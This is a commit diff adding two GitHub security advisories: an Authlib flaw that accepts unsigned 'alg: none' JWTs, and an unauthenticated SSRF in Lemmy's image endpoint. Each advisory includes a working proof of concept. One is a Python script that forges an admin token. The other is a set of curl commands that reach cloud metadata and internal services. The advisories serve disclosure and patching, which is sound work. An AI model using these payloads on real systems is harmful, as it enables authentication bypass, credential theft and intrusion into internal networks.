Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit ca61b4ad994a · 2026-03-04T20:57:45.000Z
GHSA-7wc2-qxgw-g8gg GHSA-jvxv-2jjp-jxc3
diff --git a/advisories/github-reviewed/2026/03/GHSA-7wc2-qxgw-g8gg/GHSA-7wc2-qxgw-g8gg.json b/advisories/github-reviewed/2026/03/GHSA-7wc2-qxgw-g8gg/GHSA-7wc2-qxgw-g8gg.json
@@ -0,0 +1,68 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7wc2-qxgw-g8gg",
+  "modified": "2026-03-04T20:55:47Z",
+  "published": "2026-03-04T20:55:47Z",
+  "aliases": [
+    "CVE-2026-28802"
+  ],
+  "summary": "Authlib: Setting `alg: none` and a blank signature appears to bypass signature verification",
+  "details": "### Summary\nAfter upgrading the library from 1.5.2 to 1.6.0 (and the latest 1.6.5) it was noticed that previous tests involving passing a malicious JWT containing alg: none and an empty signature was passing the signature verification step without any changes to the application code when a failure was expected. \n\n### Details\nIt was likely introduced in this commit:\nhttps://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75\n\n### PoC\n```\nfrom authlib.jose import jwt, JsonWebKey\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nimport json\nimport base64\n\n\ndef create_jwks():\n    private_key = rsa.generate_private_key(\n        public_exponent=65537, key_size=2048, backend=default_backend()\n    )\n    public_pem = private_key.public_key().public_bytes(\n        encoding=serialization.Encoding.PEM,\n        format=serialization.PublicFormat.SubjectPublicKeyInfo,\n    )\n    jwk = JsonWebKey.import_key(public_pem).as_dict()\n    jwk[\"kid\"] = \"test-key-001\"\n    jwk[\"use\"] = \"sig\"\n    jwk[\"alg\"] = \"RS256\"\n    jwks = {\"keys\": [jwk]}\n    return jwks\n\n\ndef create_forged_token_with_alg_none():\n    forged_header = {\"alg\": \"none\"}\n    forged_payload = {\n        \"sub\": \"user123\",\n        \"role\": \"admin\",\n        \"iat\": 1735603200,\n    }\n\n    header_b64 = base64.urlsafe_b64encode(\n        json.dumps(forged_header).encode(\"utf-8\")\n    ).rstrip(b\"=\")\n\n    payload_b64 = base64.urlsafe_b64encode(\n        json.dumps(forged_payload).encode(\"utf-8\")\n    ).rstrip(b\"=\")\n\n    forged_token = header_b64 + b\".\" + payload_b64 + b\".\"\n    return forged_token\n\n\njwks = create_jwks()\nforged_token = create_forged_token_with_alg_none()\ntry:\n    claims = jwt.decode(forged_token, jwks)\n    print(f\"VULNERABLE: Forged token (alg:none) accepted: role={claims['role']}\")\nexcept Exception as e:\n    print(f\"SECURE: Token rejected - {type(e).__name__}\")\n```\n\nOutput:\n```\npip install -q authlib==1.5.2\npython3 authlib_alg_none_vulnerability.py \nSECURE: Token rejected - BadSignatureError\npip install -q authlib==1.6.5\npython3 authlib_alg_none_vulnerability.py \nVULNERABLE: Forged token (alg:none) accepted: role=admin\n```\n\n### Impact\nUsers of the library are likely not aware that they now need to check the provided headers and disallow `alg: none` usage, it is not obvious from the release notes that any action needs to be taken. As a best-practice, the library should adopt a 'secure by default' stance and default to rejecting it and allow the application to provide an algorithm whitelist.\n\nApplications using this library for authentication or authorization may accept malicious, forged JWTs, leading to:\n- Authentication bypass\n- Privilege escalation\n- Unauthorized access\n- Modification of application data",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "authlib"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "1.6.5"
+            },
+            {
+              "fixed": "1.6.7"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.6.6"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/authlib/authlib"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-347"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-04T20:55:47Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-jvxv-2jjp-jxc3/GHSA-jvxv-2jjp-jxc3.json b/advisories/github-reviewed/2026/03/GHSA-jvxv-2jjp-jxc3/GHSA-jvxv-2jjp-jxc3.json
@@ -0,0 +1,64 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-jvxv-2jjp-jxc3",
+  "modified": "2026-03-04T20:55:00Z",
+  "published": "2026-03-04T20:55:00Z",
+  "aliases": [
+    "CVE-2026-29178"
+  ],
+  "summary": "Lemmy has unauthenticated SSRF via file_type query parameter injection in image endpoint",
+  "details": "## Summary\n\nThe `GET /api/v4/image/{filename}` endpoint is vulnerable to unauthenticated SSRF through parameter injection in the `file_type` query parameter. An attacker can inject arbitrary query parameters into the internal request to pict-rs, including the `proxy` parameter which causes pict-rs to fetch arbitrary URLs.\n\n## Affected code\n\n`crates/routes/src/images/download.rs`, lines 17-40 (`get_image` function):\n\n```rust\npub async fn get_image(\n  filename: Path<String>,\n  Query(params): Query<ImageGetParams>,\n  req: HttpRequest,\n  context: Data<LemmyContext>,\n) -> LemmyResult<HttpResponse> {\n  let name = &filename.into_inner();\n  let pictrs_url = context.settings().pictrs()?.url;\n  let processed_url = if params.file_type.is_none() && params.max_size.is_none() {\n    format!(\"{}image/original/{}\", pictrs_url, name)\n  } else {\n    let file_type = file_type(params.file_type, name);\n    let mut url = format!(\"{}image/process.{}?src={}\", pictrs_url, file_type, name);\n    // ...\n  };\n  do_get_image(processed_url, req, &context).await\n}\n```\n\nThe `file_type` parameter (`ImageGetParams.file_type: Option<String>`) is directly interpolated into the URL string without any validation or encoding. Since pict-rs's `/image/process.{ext}` endpoint supports a `?proxy={url}` parameter for fetching remote images, an attacker can inject `?proxy=...` via `file_type` to make pict-rs fetch arbitrary URLs.\n\nThis endpoint does not require authentication (no `LocalUserView` extractor).\n\n## PoC\n\n```bash\n# Basic SSRF - make pict-rs fetch AWS metadata endpoint\n# The file_type value is: jpg?proxy=http://169.254.169.254/latest/meta-data&x=\n# This constructs: http://pictrs:8080/image/process.jpg?proxy=http://169.254.169.254/latest/meta-data&x=?src=anything\n\ncurl -v 'https://TARGET/api/v4/image/anything?file_type=jpg%3Fproxy%3Dhttp%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%26x%3D'\n\n# Scan internal services on the Docker network\ncurl -v 'https://TARGET/api/v4/image/anything?file_type=jpg%3Fproxy%3Dhttp%3A%2F%2Flemmy%3A8536%2Fapi%2Fv4%2Fsite%26x%3D'\n\n# The same issue exists in the image_proxy endpoint, but it requires the\n# proxy URL to exist in the remote_image table (RemoteImage::validate check),\n# making it harder to exploit.\n```\n\nThe response from the internal URL is streamed back to the attacker through pict-rs and Lemmy.\n\n## Impact\n\nAn unauthenticated attacker can:\n- Access cloud metadata services (AWS/GCP/Azure instance metadata) from the pict-rs service\n- Scan and interact with internal services on the Docker network (pict-rs is typically co-located with Lemmy, PostgreSQL, etc.)\n- Bypass the `RemoteImage::validate()` check that protects the `image_proxy` endpoint\n\n## Suggested Fix\n\nValidate the `file_type` parameter to only allow alphanumeric characters:\n\n```rust\nfn file_type(file_type: Option<String>, name: &str) -> String {\n  let ft = file_type\n    .unwrap_or_else(|| name.split('.').next_back().unwrap_or(\"jpg\").to_string());\n  if ft.chars().all(|c| c.is_alphanumeric()) {\n    ft\n  } else {\n    \"jpg\".to_string()\n  }\n}\n```",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "crates.io",
+        "name": "lemmy_routes"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.19.16"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.19.15"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-jvxv-2jjp-jxc3"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/LemmyNet/lemmy/commit/f47a03f56d1797bceab5f34b6f624c91cecd5871"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/LemmyNet/lemmy"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-04T20:55:00Z",
+    "nvd_published_at": null
+  }
+}
